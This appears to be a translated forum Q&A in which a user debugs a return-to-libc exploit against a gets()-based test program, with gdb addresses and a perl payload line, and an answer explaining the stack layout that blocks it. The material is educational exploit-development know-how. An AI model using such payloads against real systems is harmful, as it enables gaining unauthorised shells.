Return to libc - problem

Question

Return to libc - problem

I have problems with return-to-libc exploit. The problem is that nothing happens, but there is no segmentation error (and yes, I really overflow the stack).

This is my program:

int main(int argc, char **argv) { char array[512]; gets(array); }

I use get instead of strcopy because my addresses start at 0x00 and strcpy thinks this is the end of the line, so I cannot use it.

Here are the addresses I need:

 $ gdb main core (gdb) p system $1 = {<text variable, no debug info>} 0x179680 <system> (gdb) p exit $2 = {<text variable, no debug info>} 0x16f6e0 <exit> (gdb) x/s 0xbffffe3f 0xbffffe3f: "/bin/sh"

When you enter the correct sequence, this happens:

 eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main eleanor@eleanor32:~/testing/root$

Oh nothing.

But if I enter 520 'A (0x41), then the EIP overflows with "A". If there is 516 'A', nothing happens, but EIP contains the system address following the exit address, following the / bin / sh pointer.

Why didn’t anything happen?

+8

c linux stack-overflow buffer-overflow exploit

eleanor Feb 17 '11 at 12:52

source share

1 answer

osgx · Accepted Answer · 2011-02-18T19:31:42+0000

Assume some asm to:

The code

 $ cat gets.c int main(int argc, char **argv) { char array[512]; gets(array); }

Asm

 $ gcc gets.c -o getsA.s -S -fverbose-asm $ cat gets.s .... .globl main .type main, @function main: leal 4(%esp), %ecx #, andl $-16, %esp #, pushl -4(%ecx) # (1) pushl %ebp # 2 movl %esp, %ebp #, pushl %ecx # 3 subl $516, %esp #, leal -516(%ebp), %eax #, tmp60 movl %eax, (%esp) # tmp60, call gets # << break here addl $516, %esp #, << or here to see the stack picture popl %ecx # (3') popl %ebp # (2') leal -4(%ecx), %esp # (1') ret .size main, .-main

The prologue and epilogue (they are with alignment code) are described in detail here. Understanding the goals of some assembly statements

Stack Layout:

 (char) array[0] ... (char) array[511] (32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to (32bit) $ebp - pushed by 2 (32bit) $esp - pushed by 1 - change the $esp to the original value

So, if you want to change the return address of main, you should not change the address on the stack that ret will use, but push the values stored in the stack (1), (2), (3). Or you can embed a new return address in the array itself and just rewrite (3) with your new stack address + 4. (use a 516 byte string)

I suggest you use this source code to crack it:

 $ cat getss.c f() { char array[512]; gets(array); } int main(int argc, char **argv) { f(); }

because f has no stack implementation issues

 .globl f .type f, @function f: pushl %ebp # movl %esp, %ebp #, subl $520, %esp #, leal -512(%ebp), %eax #, tmp59 movl %eax, (%esp) # tmp59, call gets # leave ret .size f, .-f

Stack layout for f() :

 (char) array[0] ... (char) array[511] (32bit) old ebp (32bit) return address

The breakpoint on the ret command in f () with 520 bytes "A"

 (gdb) x/w $sp 0xXXXXXa3c: 0x41414141

Return to libc - problem

More articles: